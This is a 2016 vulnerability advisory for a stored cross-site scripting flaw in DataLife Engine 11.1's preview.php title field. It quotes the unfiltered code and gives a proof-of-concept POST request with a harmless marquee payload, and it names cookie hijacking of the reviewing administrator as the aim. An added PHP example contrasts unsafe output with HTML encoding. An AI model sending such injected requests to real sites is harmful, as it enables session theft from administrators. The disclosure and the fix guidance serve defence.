DataLife Engine 11.1 - Stored Cross Site Scripting (XSS)
==========================
- Discovered By : 0x3a
- http://iran-cyber.net
- taha[dot]0x3a[at]gmail[dot]com
- Credit To Iran Cyber Security Group
- Release Date : 10.8.2016
- Level : High
==========================
I.Vulnerability
---------------
DataLife Engine 11.1 and lower versions - Cross Site Scripting
DataLife Engine 11
DataLife Engine 10
II.BackGround
-------------
DataLife Engine (DLE) is a CMS with which you can build your website and forum.
https://dle-news.com/
https://ru.wikipedia.org/wiki/DataLife_Engine
A Google search for "intext:Powered+by+DataLife+Engine" returns about 1 million websites powered by DLE:
https://www.google.com/search?q=intext:Powered+by+DataLife+Engine
III.Introduction
----------------
DataLife Engine is a multifunctional Content Management System. Thanks to a very powerful news, article, and user management system, DataLife Engine is designed primarily for creating mass media websites and blogs on the Internet.
IV.DESCRIPTION
--------------
DLE has a security problem: it can be exploited by an XSS attack.
The vulnerability is in /DLE/engine/preview.php.
With this vulnerability you can inject malicious code into the website.
The relevant code can be found in the /DLE/engine/preview.php source file:
if( $config['allow_site_wysiwyg'] ) {
    $title = stripslashes( $parse->process( $_POST['title'] ) );
$_POST['title'] is used without any filter, which causes the XSS vulnerability.
This vulnerability can be used for cookie hijacking, because any text you post must be checked and
submitted by an administrator.
V.PROOF OF CONCEPT EXPLOIT
--------------------------
First you must register on the DLE website.
Then you can submit a post. Complete all fields, open HTTP Live Headers, then click
the preview button.
POST Parameters:
title=Test&catlist%5B%5D=1&vote_title=&frage=&vote_body=&short_story=Test&full_story=Test&tags=&sec_code=174991&nview=&mod=preview
You can run your payload in this parameter:
[ title ]
title=<marquee>Discovered By 0x3a [ Iran Cyber Security Group]</marquee>&catlist%5B%5D=1&vote_title=&frage=&vote_body=&short_story=Test&full_story=Test&tags=&sec_code=174991&nview=&mod=preview
VI.SYSTEM AFFECTED
------------------
All versions of DLE are affected.
VII.SOLUTION
------------
1. You can use a filter function such as htmlspecialchars(), addslashes(), or htmlentities() to patch this
vulnerability.
2. You can disable registration on your website, but ...
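The following is an added example, not DLE's own code, illustrating the vulnerable preview pattern from the DESCRIPTION section beside the output-encoding fix recommended in the SOLUTION section. The request array is constructed to mirror the PoC parameter names, the function names (renderPreviewUnsafe, renderPreviewSafe, escHtml, containsInjectedTag) are hypothetical, and the $parse->process() call from the real file is omitted:

```php
<?php
// Added example, not DLE's own code: contrasts the unfiltered preview title
// with an output-encoded version. The request body below is constructed and
// mirrors the parameter names from the PoC; $parse->process() is omitted.

declare(strict_types=1);

// Constructed sample request, as the preview handler would receive it.
$samplePost = [
    'title'       => '<marquee>constructed payload</marquee>',
    'short_story' => 'Test',
    'full_story'  => 'Test',
    'mod'         => 'preview',
];

// Vulnerable pattern: the POSTed title reaches the HTML response unchanged,
// so any markup in it is rendered by the reviewing administrator's browser.
function renderPreviewUnsafe(array $post): string
{
    $title = stripslashes($post['title'] ?? '');
    return "<h1>{$title}</h1>";
}

// Hardened pattern: encode for the HTML body context at the point of output.
// ENT_QUOTES also encodes ' and ", so the same helper is safe inside
// double-quoted attributes; UTF-8 is given explicitly so invalid byte
// sequences are not silently passed through.
function escHtml(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

function renderPreviewSafe(array $post): string
{
    $title = stripslashes($post['title'] ?? '');
    return '<h1>' . escHtml($title) . '</h1>';
}

// addslashes() escapes only quotes, backslashes and NUL; it leaves < and >
// untouched, so by itself it does not prevent HTML injection.
function renderPreviewAddslashesOnly(array $post): string
{
    $title = addslashes($post['title'] ?? '');
    return "<h1>{$title}</h1>";
}

// Self-check: true when the text inside the surrounding <h1> still contains
// a raw tag opener.
function containsInjectedTag(string $html): bool
{
    $inner = substr($html, strlen('<h1>'), -strlen('</h1>'));
    return (bool) preg_match('/<[a-z!\/]/i', $inner);
}

function expect(bool $condition, string $what): void
{
    if (!$condition) {
        throw new RuntimeException("check failed: {$what}");
    }
}

$unsafe  = renderPreviewUnsafe($samplePost);
$safe    = renderPreviewSafe($samplePost);
$slashed = renderPreviewAddslashesOnly($samplePost);

printf("unsafe : %s\n", $unsafe);
printf("safe   : %s\n", $safe);
printf("slashes: %s\n", $slashed);

expect(containsInjectedTag($unsafe) === true,  'unsafe output renders the tag');
expect(containsInjectedTag($safe) === false,   'encoded output contains no raw tag');
expect(containsInjectedTag($slashed) === true, 'addslashes alone leaves the tag');
echo "checks passed\n";
```

Run it with php on the command line; the encoded line shows the title as &lt;marquee&gt;... while the other two still carry a live tag. The encoding must happen at output time in every template that prints the title, not once at input, since the same value may later be emitted into a different context. Setting the session cookie with HttpOnly (session.cookie_httponly=1 in php.ini) limits the cookie-hijacking impact described above, although it does not remove the injection itself.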
------
0x3a